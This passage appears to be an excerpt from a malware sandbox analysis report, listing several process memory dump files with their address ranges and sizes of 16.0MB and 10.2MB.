16.0MB
-
memory/3708-51-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmpFilesize
16.0MB
-
memory/3708-52-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmpFilesize
16.0MB
-
memory/3708-58-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmpFilesize
16.0MB
-
memory/3812-148-0x0000000000400000-0x0000000000E31000-memory.dmpFilesize
10.2MB